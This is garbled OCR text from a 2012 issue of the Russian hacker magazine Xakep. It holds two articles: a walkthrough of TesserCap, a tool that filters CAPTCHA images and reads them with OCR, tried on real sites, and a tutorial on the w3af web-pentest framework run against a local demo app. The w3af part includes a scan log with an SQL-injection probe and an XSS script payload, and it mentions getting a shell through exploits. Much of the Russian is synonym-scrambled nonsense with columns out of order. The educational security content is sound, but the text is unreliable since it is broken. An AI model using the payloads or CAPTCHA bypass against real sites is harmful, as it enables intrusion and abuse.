чающая/отключающая устройство предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная переработка изображений отключена. Пользователи вначале настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты к всех пикселей изображения.

{

Каждое числовое равнина может вмещать

if (invertRed is true) new red=255 - current red if (invertBlue is true) new Ыuе=255 - current Ыuе if ( inve r tGree n is true) new green=255 - current green

компонентов каждого пикселя во зависимости от значения на край выполняются следующие

действия:

0.

САРТСНА-изображениям равно а там активируют загружаемые позже включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если важность одинаково

-1, согласующий

цветовой устройство безвыгодный меняе т ся.

ки изображений в соответствии с тестируемым этот узел . Все СА РТ СНА-изображения,

057

lот -1 давно 0551 возможных значений. Для RGВ­

0.

Если спица в колеснице никак не равняется

-1,

весь найденные

компоненты указанного цвета !красный, зе­

Инверсия одного сиречь нескольких цветов

леный либо — либо синий] меняю т ся во соответствии

сплошь и рядом открывает новые потенциал пользу кого про­

веркитестируемого САРТСНА-изображения.

вместе с введенным на полина значением. Значение О удаляет компонент, важность

тельную обработку равным образом сделано кроме передаются в ОСR-систему Tesseгact ради извлечения

Этап

0. Изменение

цвета

текста.

На данном шаге позволено обновить цветовые

055 устанав­

ливает его максимальную сочность

равно т. д.

Этап

0. Градация

серого !Шкала яркости)

На третьем буква п е однако изображения конверти ­ руются на изображения на градациях серого . Это Chop"""' O Activ.ste

01 <· 0 t~

единый неукоснительный каста п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости с выбранной кнопки выполняется одно изо следующих действий, связанных от цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 00.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

0.

В зависимости через интенсивности да рас­

пределения цветовой составляющей САРТСНА любой с сих филыров может улучшить @ Smooth Mack 0

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 0

0

извлекаемое портрет про дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

0.

Сглаживание да нелицеприятность

Чтобы осложнить вынимание текста И з мен е ни е до м ех близ изменении различны х д равно апазонов цветового з начения 14 для сел ей во сторону белого или — или черного

с САРТСНА-изображе н ий, во них д обавляют

Х АКЕР

03 /158/2012


П рове р ка держи п ро чн ос ть

крик на форме однопиксельных либо — либо многопик­

выдается ляпсус да слепок невыгодный около меняе т ся.

Этап

сельных точек, посторонних линий равным образом пре­

П ри выборе фиксированной маски кнопку

Это т фу льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

пускать в ход безвыгодный требуется.

0. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г относительно

Passes

Cutoff.

В числовом закраина

нужно указать, как много единовременно нужно

ния уров н моя персона бездарно г в рассуждении в отношении т частоты

(cutoff) встречаемос т равно

работы относительно т секаю щ его фу! льт ра п оказа н ни а

устранения которого дальше используются

другими словами

Настройка отсечения

равным образом предлагае т выбрат ь отнятие . П ри нц да п

изображения возрастает стохастический шум, ради

Bucket

0.

оттенки серого

во п посевная д очес д е :

пиксели могут бытийствовать окрашены на объёмистый

воспользоваться с~ответствующую маску изобра­

масштаб оттенков серого. Этот фильтр ото­

жения до переходом держи нижеперечисленный этап.

бражает размещение градаций серого

Давай рассмотрим компоненты фильтра для того

во

сглаживания да повышения резкости. Доступ­

пикселей, окрашенных на оттенки серого

ны пара вроде масок изображения:

во диапазоне с О впредь до

00 баке т ахти [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан на ба кете О,

if (pi xe l 's gr ays cal e value <=Cutoff ) pixel graysca l e val ue=( е OR 055) - > на зави вместе с им в рассуждении сти, по отношению т т что до го что а мы опция выбра н а (<=и ли=> : Set Every Pi xel with valu e <=/=> Th r eshold t o е. Rema i ning t o 055 )

Фиксированные маски. По умолчанию

прибыль пикселей, окрашенных во в рассуждении тт енки

TesseгCap имеет полдюжины в особенности популяр­

маловыразительно г по части во диапазоне ото

ных масок изображения. Эти маски могут

выравнивать образ тож жаловать

с следующих действий про каждого диа­

ние пикселей САР Т С Н А за цвета м равным образом п омо г ае т

некультурность [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

уничтожить п омехи вместе с через отсе ч ения з н а ч е­

менения отображаются приёмом но потом вы­

серого:

ний уро вн аз многогрешный серого .

бора маски вместе с через соответствующих

0. Остави т ь сверх измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

03

перед

05,-

на ба кете

т. д. Пользователь может наметить одно

0: Обтесывание (choppiпg)

После применения не без; глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п что касается д роб н ое рас пр е д е л е ­

Бла г одаря сим оп ц иям позволяется контроли­

bucket-

равным образом д ругих фуй! л ьтро на САР Т С Н А ­

изображе н ия всё е щ е могут уклад жизни ь ради ш у м ле н ы

вводя значения во числовые полина равным образом нажи­

ровать небо и земля диапазоны оттенков се­

однопиксельными или — или счета п иксе л ьными

мая кнопку

рого, а и сокращать/удалять шум, меняя

точками, посторонними линиями равно п реетран ­

оттенки серого на сторону белого тож черного.

етвенными искажениями . П рин ц да п рабо т ы

Save Mask . Если

платеж коэф­

фициентов во сих окошках больше нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается на следую­

меняет его спица в колеснице уровня серого новым,

щем: даже если наличность смежных пикселей,

наравне показано подальше на псевдокоде. Инверсия

окрашенных во настоящий валер серого, мен ь ше

серого проводится в целях подгонки изображе­

этой утилиты, да сейчас что надо было бы про­

величины на числовом поле, фильтр обтесы во а­

ния перед ц во етовые настройки ОСR-системы.

опробывать какую-нибудь капчу получай прочность.

ния п сарацинское пшено на аивает им з н аче н ие О [ ч ерный ! либо

055 [белый! п по отношению на ыбору п что до л ьзователя. П ри э т ом САР Т С Н А анализируется что во горизонталь­ ном, круглым счетом равно на вертикал ь ном направлении.

Ну аюшки? ж, пожалуй, наша сестра рассмотрели безвыездно опции

Предлагаю для того примера брать болона говорят xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value=255 - current graysc al e value

Итак, запускаем утилиту да пойдемте получай сайт журнала . Видим меню свежих новостей, за­ ходим во первую попавшуюся равно пролистываем

прежде места, идеже дозволительно покончить собственный коммента­ Этап

0: Изменение

ширины мера .

Этап

00: Проверка

распознавания капчи

рий. Ага, коммент беспричинно без затей неграмотный приплюсовать [еще бы, а ведь бы давным-давно сейчас всё эаспамилиl- нужно

Как у тв ерж д ает виновник ути л да т ы, на ходе

Цель данного этапа - изобразить предвари­

п ерво н ачаль н ых равно сс л е д ова н ий равно разра­

тель н об обработанное САРТС Н А-изображение

впрыскивать капчу. Н у аюшки? ж, проверим, дозволено

ботки TesseгCap некто не разок и не два отмечал,

ОСR-системе для того распознавания. Кнопка

ли сие автоматизировать . Копируем

что, когда-когда САРТСНА-изображения имеют

Solve

беретка слепок со временем фильтра

URL

картинки равно вставляем его на адресную строку

толстую граничную линию равно ее цветок отлича ­

инверсии серого, отправляет во ОСR-систему

TesseгCap . Указываем, в чем дело? нужно нагрузить

ется ото основного фона САРТСНА, кое-кто

чтобы извлечения текста равным образом отображает воз­

капч, да нажимаем Staгt . Программа послушливо

вращенный машинопись на графическом интер­

загрузила

Д анный фильтр п редназ н ачен на обрабо т ки

системы

фейсе. Если опознанный телекс совпадает

познать. К сожалению, целое капчи оказались

OCR

неграмотный могут рас п ознать текст.

02

02

картинок да попыталась их рас­

граничных линий да их изменения. Граничные

со текстом возьми капче, значит, наш брат по правилам

либо неграмотный распознаны, по части нежели свидетельствует

контуры вместе с шириной, которая указана во число­

задали фильтр чтобы предварительной об­

титул

вом поле, окрашиваются во угольный alias смерть

работки. Теперь дозволяется перевестись держи вкладку

неправильно. В общем, неудивительно, этак

по части выбору пользователя.

опций равным образом зачислить опцию предварительной

в качестве кого посторонние шумы равно искажения малограмотный были

обработки [ЕnаЫе

удалены. Этим да мы от тобой немедленно равно займемся . Жмем

Этап

0: Инверсия

серого оттенка

Это т фу-ты л ьтр п роходит каж ды й пиксель равно увлекаться

lmage Pгepгocessiпgl на

-Failed-

подина ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши получай одну с

капч.

женных картинок да отправляем ее во систему

02

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка держи пр что касается чн отросток

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев всегда

ЗАКЛЮЧЕНИЕ

В конечном итоге, вроде моя особа ни бился, в ажуре

САРТСНА - изображения являются одним

пронюхать болона говорят у меня приближенно равным образом отнюдь не получилось .

с самых эффективных механизмов согласно защите

ры, отчего пойдем держи вкладку опций равно указы ­

Пришло сь производить опыты со pasteЬin.

веб -приложе ний с автоматизированного за­

ваем, почто опознавать нужно токмо цифры

com,

[Сhагасtег

02

капч, видим , что такое? они содержат всего циф­

Это, равно как видишь, совер шенно неверно.

которые лишенный чего проблем посчастливилось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить сверху вкладку lmage Pгepгocessing

познать. Но если бы твоя милость окажешься уси дчивее

защити ть ото случайных роботов равным образом отнюдь не устоят

равным образом терпеливее равно сумеешь выудить кор­

прежде целенаправленными попытками их

ради настройки фильтров. Сразу скажу, что такое?

ректное распознание капч от xakep.гu, так

решить. Как равным образом криптографические алгоритмы,

п что касается игравшись со первыми тремя фильтрами

махом заходи нате вкладку опций да включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные равным образом обес п ечи на ающие ваш брат сокий уро­

<< Градация бесцветно г что до » ] пишущий эти строки отнюдь не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, следственно оставил затем

нате

и, кликнув получи Staгt, загружай свежую

способом защиты. На основе статистики,

всё в области дефолту. Я выбрал маску

порцию капч, которые пока что будут пред­

которую привел либреттист программы, моя особа выбрал

варительно возделываться твоим филь­

с целью своих п роектов гeCaptcha равным образом буд у реко­

Smooth Mask

установил наличность насчет ходов равным

Main

тром. П осле того, как бы список отработает,

мендова ть ее во всех отношениях своим друзьям- возлюбленная ока ­

залась самой стойкой с протес т ированных.

которых меньше, нужно учредить во О, а те,

забраковать корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С сего момента дозволяется просма­

которых больше, во

тривать сво дн ую статистику до распознава­

полуавтоматизированное вотум САРТС Н А.

нию вместе с через

Через особенный

одному. Фильтр Gгayscale

buckets

моя особа пропустил

да перешел за единый вздох для настройке отсечения . Вы­ б рал вес

054

да указал, в чем дело? те пиксел и,

055.

Чтобы отменить

касательно т оставшихся точек, включил

chopping

равно из­

Show Statistics . В

общем-то ,

В любом случае невыгодный от тоит забы вать , сколько во Сети есть нема ло сервисов, которые предлагают

API

твоя милость передаешь серви­

сие индивидуальный подотчет по отношению защищенности пирушка

су слепок , а оный путем непродолжитель ­

фильтр вовлекать безграмотный было смысла, потому автор этих строк

или — или какой-то САРТСНА. Если имеет смысл дилемма в отношении вы­

ное период кайфовый звра щает вердикт . Решает ка пч у

из разу нажал сверху

боре того либо — либо др угого решения, так со помо­

вещественный засранец [например, с Китая ] , п о­

щью TesseгCap основательно не возбраняется принять свое

лучая из-за сие свою копеечку. Ту т поуже дрянный

собственное тестирование.

защиты пропал : ]. ::::к:

менил ширин у параметры впредь до

00. Последний

Solve.

На капче у меня было число н об утилита распознала его

014945, как 011435.

Содержание во дыме сигареты: смолы - 0; 0 мг, никотина- 0,4; 0, 0 мг, С О- 0; 0 мг

0Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара вместе с Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

с целью веб-пентестера

·~

Ин форм ац равно я пред ст авп е н а и из кл юч равным образом т ел ьно для в отношении з н ак что до м ления .

Редакция безвыгодный нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

из-за е е использование в прот да изумительный з а для по отношению н ны х

целя х. nодобные

-де йствия вл ек у т з а со о й уголовно е преследование .

Прое для т wЗaf из равным образом льно выделяется сред равно мног их други х инструм е нтов интересах ис от ледования

безопасности веб-приложени й. Это

невыгодный обычны й сканнер от неумолимо забитым функционалом , а фреймвор к, позволяющи й

равно спользовать больше сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н да пишущий эти строки сделано скудно нежели похожи н а своих п ред­ ш естве н нико во , ко т крик ы е бы л да во движение у е щ е п ваш покорнейший слуга т ь л ет н аза д . Они стано ­ вятся всё побольше популярными, ис п ользуют куда как свыше техно­ логий, что-то увеличивает вероятный градиент атаки, обрабатывают всё больше разной информации, в томище числе и финансовые равно переанальные данные . Чтобы сбавить риски, пишущий сии строки можем ввести процес от безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является бревно т иро во ание безопас н ости. Услов н касательно говоря , дозволительно выде­ лить четное число ыре на ида тестиро во ания безопасности веб - приложения :

0. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня аз многогрешный хочу рассказа т ь что до проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , что может фигурировать исполь зова н для для тестирования бе зо пасности во еб-приложения

первых двух видов тестирования. Автором сего открытого проекта является Андреас Рианчо изо Аргентины. Сейчас вариант разрабаты­ вается nреимущественно им да жалкий гру nn ой контрибьюторов

со по сию пору г в отношении мира, на ко т орую ход ит да ав т оранье сих строк

,._ ~.ы. jNII'amtWI axllt

ним в свой черед принимают активное соболезнование такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе нате д

Thll ptugln 0nr:ts СIОМ 0118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

в духе

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

да Я ндекс! Фреймворк написан держи

Python,

который, как бы твоя милость

знаешь, является << языком не без; батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось поуже более сотни. Это, конечно, еще не

Mozilla

Fiгefox, только сделано хватит мощное орудие .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

0:3

011111'A:18f01CМC~~s l 0

в отношении

0 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит изо двух важных частей: ядра равным образом плагинов.

Главное остановка wЗaf

Ядро запускает передовой nроцесс да координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк с целью пенте от т фигляр

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

для на еб -nрил оже нию да его ответах . Если по отношению nять пров yes ти аналогию

.

со сообща

(вrutforce) ~ : •

0

UNI X, сие положительно эквива л ен ттекс т ово го nотокового sed, н насчёт ужедля НТТР-транз акций. Заме жилка вот всех от­

редактора

ветах hidd en -n oля получи и распишись обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются для того обхо д а nростых nравил раз­

0.

личных 005. Хо чеш ь nодальше лишаться незамече нным nр да nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь с сего набора.

0.

Оutрut-nлагины выn ол няют простую миссию: формируют на удо бо­ читаемом виде в отношении т четы в рассуждении результатах работы wЗaf. Вы бирай, что тебе пуще nодходит-<<nравославныЙ >> текстовый выкройка т не так — не то

И нфо рмаци касательно нный nоток во wЗaf

<<э нтерn райз н ый>>

POF,-

тож nо-быстрому наnиши больше nод­

ходячий чтобы твоих нужд nлагин . а приблизительно но обме н инфо рмации посередь ними. Плаг ины, во от во ою очередь,

0.

Аuth-nлагины берут возьми себя сполна nроцесс уnравления nоль­

находятуязвимости равно п озволяют пр оэкс пл уа тировать их. Ч ерез стержень

зо во ательской сессией: авторизируются во веб-nриложении,

плагины обмениваются информацией, ко прим еру, что касается найденн ых запро­

nроверяют, так чтобы фотосессия оставалась мотай отсюда дн ой, равно выnолняют во

сах на фаззинга. В ко аче из тве ц ентрального хранилища информации

конце сканирования исправный парад с веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

по части ч е нь фаллос обно. Ещ ё со во сем н е давн об отнюдь не б ыл в отношении удоб н ой внутренние резервы

Слово «фрейм ворк >> на названии разработки у п отребляется далеко не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, на в таком случае период что цельный функцио­

просматривать nользовательские части веб-приложений, так yes ть те, ась? получи хо дятся ради авторизацией. Да , не грех было обозначить wЗaf

звонкая монета в целях пентеста реализован на разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную равным образом з браузера куку, н что касается

ск анир ова ния твоя милость можешь облюбовать только лишь нужные тебе аддоны,

сие н е самый хуй обный сnособ. Сейчас на составе wЗaf только единодержавно

комбинируя их. Плагин каж дого типа, котор ы х на общей сложности на­

аuth -n лагин, да симпатия nодойдёт с целью большинства случае в. Д а равным образом безграмотный

счи тываетс аз многогрешный восемь, отвечает вслед за проведение в жизнь относительно пр е деленной ради дач да .

забывай, почто наша сестра имеем д ело со фреймворком, да дозволительно наnисать

0. Плагины в целях поиска во холм можны хточек во хо правда во пр иложение !или та для

такого типа nлагин nрактически с целью первый встречный склад ауте нт ификации:

называемые disсоvегу-плагиныl собирают комплекция , ссылки да вместе

SMS, токены

равным образом т.n . У тебя на руках все мощь Python!

всё, что-нибудь можетсгенерироватьзапрос ко на еб- пр иложению. Та ким об­ ра зо м формируется локальная общественный порядок координат запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является умереть и не встать веб-паук ,

Теnерь, рано или поздно наша сестра малограмотный бессчетно разобрались не без; архитектурой wЗaf, настало

скаются на круговорот е, по причине ч ему цели , обнаруженные для пр е дыду­

срок у любоваться его на д ействии. Сnециа льн об чтобы д емо н из трации ваш покорный слуга на­

щем этапе, п что до падают бери во хо д сих а плаг ино на для следующем э тап е.

nисал nростое, однако оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п что до р, n ока никак не хорэ д ос тигн ут

наnравленнос т равно nод названием ltte г. Да , сие сер во ис с целью ведения

лимит, обыкновенный на режима nои ска цел ей к фаззинга.

0. Аудит-nлагины исnользуютвывод nлаг инов !то глотать т рамы входа в nриложениеl с целью n оиска у автор з на равно мастей, котяга орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI равно воз

микроблогов, равным образом , пишущий эти строки надо еюс ь , возлюбленный ста н е ттаким а nоnулярным, в качестве кого его

односторонний

040 символами бери одно депеша стар ши й подсвечник т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано для

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска равным образом услуга nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный на виде модуля webSpideг. Оisсоvег у -плагины ради пу­

Gгер-nлагины nросты, же во в свой черед промежуток времени очен ь nолезны, вроде да изо во ест­

nолноценный достуn для функционалу nриложения nредоставляется

ная UNI Х-ут илита , на целомудренность которой они получай з ваны . Смысл та кой: вследствие

токмо заре гистрир ованным равным образом авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая брат НТТР -зап р ос/от вет, на которой nроизводится nоиск интересующей для вместе с информации !номера

активы н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

равно т. n.l. Эти nлагины вот и все умеют обыскивать учас тки nотенциально

имеет, бес nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для азы ну-кася nросканир уем наше веб-nриложение сверх авториза­

document.write document.location eval

тр и, однако сие n ока небольш ой заумь nр из) равно н терфейса:

ции- nросто натравим бери него сканер. В wЗa f вкушать пара ! во ообще, ранее

gtkUi - графический, основанный возьми тулките GTK; consoleUi - хакерекий Ul для того консольных старожи ловля !конечно же, со удобным мотор следовать вершением оболочка нд) .

0.

П од об ны е участки стих почасту создают nредnосылки интересах р еа­

Будем исnользова ть nервый с них. Для заnуска GUI-версии на­

ли следовать ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем во консо ли <<./wЗaf_gui>> равным образом видим в некоторой степени nо хожее бери изображен­

DOM Based XSS).

ное возьми ск р иншоте

Вгu tеfо гсе- nлагины , на правах не запрещается вдохновлять ся, nроизводят nеребор

nр офиль, цель, nлагины равным образом тулбар. Немн ого расскажу что касается nрофилях.

значений интересах ме х анизмов аутентификации НТТР

0. Гл авное

окошко раз в год по обещанию д елено бери порядком секций:

Basic равно пользу кого обыч­

утнапиштим стать с целью лаги держи . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы во хо так точно в области сод е ржани ю на ни х двух nараметро в, о дин изо которых им еетти n passwoгd. По сле об наружи ния тако й

сложение враз начинается б р ут.

0.

Аttасk-nлагины nредназначены безграмотный к nоиска брешей, а в целях их

экс пл уата ции. Они, вроде равным образом др угие аддоны, используютобщую базу знаний что касается те ст ируемом nриложении, на ча со тности , они используют ин­ формацию об найденныхуязвимастях равно пытаются их пр оэкс nл уати ­ ровать . Да-д а, то есть сии nлагины могутnомочьдобыть заповедный

••

.......

..

-

..... .. ...._.

ш е лл бери бажном сервере. ;l

0.

Маnglе-nлаг равно ны nозв оляютнал ету модифицировать что-нибудь во после nро сах

ХАКЕР

03/158/2012

Структу р а во еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 01181adGE1. f l'leS811diiiiW8S:

"limt=15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты во wЗaf

Как не грех догадаться, эт по части именованные наборы настроек, которые

Suite,

не запрещается находить применение во wЗaf. П об сути, сие in i-файлы, во которых твоя милость можешь

«nо льзовательские прокси>> позволяют на реальном времени что до т слежи­

беречь nолюбившуюся тебе конфигурацию wЗaf, во томишко числе те­

вать [и хоть изменять! НТТР-трафик посередь веб-браузером равным образом веб­

стируемый

сервером. Конечно, похожий снаряд глотать равным образом на комплекте wЗaf.

URL,

выбранные равным образом настроенные плагины, саге-настройки

равным образом многое другое. Например, с целью сканирования ltteг мы создал безыскусственный

alias ажно популярного аддона ко Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем аж две:

тавр около названием М у Pгofile, подальше подключил на нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг да

диалоговый снаряд lnteгcepting Ргоху интересах ручноготестиро­

gгер-плагинов для того

вания.

XSS-

pykto [порт знаменитого Nikto получай Pythonl, пару поиска DOM XSS равным образом мало-мальски плагинов на поиска

равно SQL-инъекций. Ч тобы обначить сканирование, нажимаем Staгt

равным образом ждем серия минут, непостоянно неграмотный появятся первые результаты. Кста­ ти, я издревле можем заботиться из-за действиями wЗaf получи и распишись вкладке

Log,

Для наших целей будем истощить spideгMan, который, вроде я

ранее разобрались, представляет внешне disсоvегу-плагин. П опробуем

гораздо на реальном времени выводятся информационные сведения

его во деле. П одключаем плагин во главном окне равным образом запускаем сканиро­

через ядра равно п лагинов. Ход процесса отображается вследствие прогреес - погребок

вание. В веб-браузере во качестве пр окси прописываем

равным образом остальные идентификаторы.

[я использую пользу кого сего адд возлюбленный F охуРгоху чтобы F iгe f ox, соответственно зво ля ющий

П ример н об посредством

минут просмотр завершается. Посмотрим,

00

027.0.0.1:44444

свободно регулировать проксями да отрываться меж ду ними! . SpideгMan

сколько посчастливилось отрыть wЗaf. П омимо ошибок конфигурации Апача равно кучи

хорэ запущен давно webSpideг, этак аюшки? свежий сможет утилизировать

подозрений получи и распишись

его результаты . Переключившись сверху spideгMan во нашем браузере, н е­

DOM XSS, скэнар обнаружил до некоторой степени XSSI Одна из них, на /i ndex.php, представляет чтобы нас специальный интерес, осталь­ ные ты да я ноне отложим. Плагин Pykto, во свою очередь, обнаружил доступную страни цу статуса Apache равно phpinfo-cкpиnт /test.php. Другие плагины установили наименование да версию использ уемого веб-сервера

равным образом веб-фреймворка. В нашем случае сие

Linux

Apache/2.2.16 получай DeЬian GNU/

да язычок программировани РНР. Др угая полезная фишка, которая

позволяет нам отличается как небо через земли осознать структуру веб-приложения,- сие вклад­

ка

URLs не без; древовидной

картой веб-приложения равно ее графическим

представлением. Здесь а дозволяется пролистнуть совершенно НТТР-транзакции, сгенер ированные на рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

0.0

Сейчас сейчас ни одной души неграмотный удивишь играми, г рафическим редактором или видеозвонками помощью веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, на которых логика выполнения запро граммирована получай стороне клиента от активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

равным образом др угих названий да аббревиатур.

:1 Такой сильный страсть технологий всё хлестче затрудняет автоматизированное опробывание безопасности веб-приложений. Прошли былые времена. Это предание сделано неграмотный относительно тестировании

большей частью г в отношении веб-сайта вместе с множеством страниц вида /aгticle.php?id=68, на ко т орых, во со вою в отношении ч е р е дь , снедать куча ссылок , форм равным образом тому п одобного <<мяса>> чтобы веб-паука. На жа на , что обычно, <Ctгi -U >,

дабы п обшмонать НТМL-к в отношении д , твоя милость увидишь масса с огромного куска JavaScгipt равным образом одну каплю тра д иционно г в рассуждении

HTML. П одобный

бессчётно полазаем по мнению тестируемому веб-приложению. В L оg-табе видим:

[Mon 00 Мау 0011 02:08:22 АМ MST] spiderMan proxy i s running on 027.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 00 Мау 0011 02 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 00 Мау 0011 02:15 : 09 АМ М5Т] Trapped fuzzaЫe requests: [Mon 00 Мау 0011 02:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 00 Мау 0011 02:15:32 АМ MST] http://localhost/user-info. php 0 Method: GET [Mon 00 Мау 0011 02 : 02:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 0911. [Mon 00 Мау 0011 02 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 0042.

«сайт» об ч ен ь

неоднократно далеко не по мнению зубам веб -п ауку, построенному соответственно классической модели.

Как видать изо лога, дабы остановить работу spideгMan, необхо­

Это не выделяя частностей беда интересное устремление про развития средств

димо перепрыгнуть получи и распишись каждому свой адрес, со временем а webSpideг равно часть

тестирования без батман сности веб-приложений. Ведь непонятно, на правах

плагины примутся вслед дело. Так , аудит-п лагины обнаружили

на этакий ситуации автоматизированно обставить поголовно сайт - встраи­

равным образом ХSS-инъекциюl П ервая дыра, оказавшаяся на правах в один из дней на АJАХ-запросе,

вать полноценные

была упущена умереть и безграмотный встать миг первого сканирования.

JS

да рендеринг-движки? Использовать подход,

Добавлю одну каплю оборона эксплуатацию найденных ба го на . WЗaf умеет

сходный Selenium/Web Dг iveг? Дл ваш покорный слуга тестирования п од обных приложений неграмотный быть без специализирован ны х прокси, т аких во вкусе

050

SQL-

OWASP WebScaгab

да В uгр

выжимать весь пот многие ожидание уязвимастей и, ко примеру, может предоставить тебе заветн ы й шел л получай целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 0012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит получи вкладке

Exploit

для уязвимость. Д ля эксплуа­

тации SQL-инъекций используется хоть умри знающий тебе

.

---........

РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос на нормальной операционной системе позволяется

на конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, вделанный на wЗaf.

вместе с через множества способов: Telпet,

~

